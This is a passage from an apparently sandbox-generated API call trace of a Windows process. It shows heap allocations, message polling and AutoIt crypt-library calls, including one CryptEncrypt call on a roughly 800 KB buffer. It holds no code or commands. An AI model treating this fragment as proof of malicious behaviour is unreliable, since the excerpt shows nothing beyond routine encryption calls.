dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0180.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0180.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0180.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xe5e020 [0180.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf60020 | out: hHeap=0x970000) returned 1 [0180.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0180.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0180.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0180.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0180.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0180.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0180.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xf3f020 [0180.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0180.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf3f020 | out: hHeap=0x970000) returned 1 [0180.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0180.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0180.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0180.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0180.492] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0180.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0180.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0180.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0180.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0180.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0180.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0180.493] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0180.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0180.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0180.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0180.493] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0180.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0180.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0180.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0180.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0180.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0180.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0180.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0180.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0180.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xf33020 [0180.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0180.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0180.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0180.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0180.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0180.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0180.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0180.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0180.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0180.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0180.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0180.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0180.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0180.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0180.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0180.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0180.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0180.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0x1006020 [0180.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0180.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0180.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0180.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0180.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0180.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0180.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0180.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0180.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0180.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0180.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0180.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0180.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0180.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0180.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0180.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0180.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0180.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0180.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.549] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0180.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0180.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0180.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.550] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0180.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0180.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0180.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0180.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.551] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0180.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0180.551] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0180.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0180.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.552] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0180.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.552] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0180.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0180.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.552] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0180.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0180.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0180.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0180.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0180.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.553] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0180.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0180.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x10d3020 | out: hHeap=0x970000) returned 1 [0180.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0180.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0180.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0180.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c98 [0180.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0180.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54350 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.611] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xc4066, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xc4068) returned 1 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0180.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0180.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0180.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0180.613] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 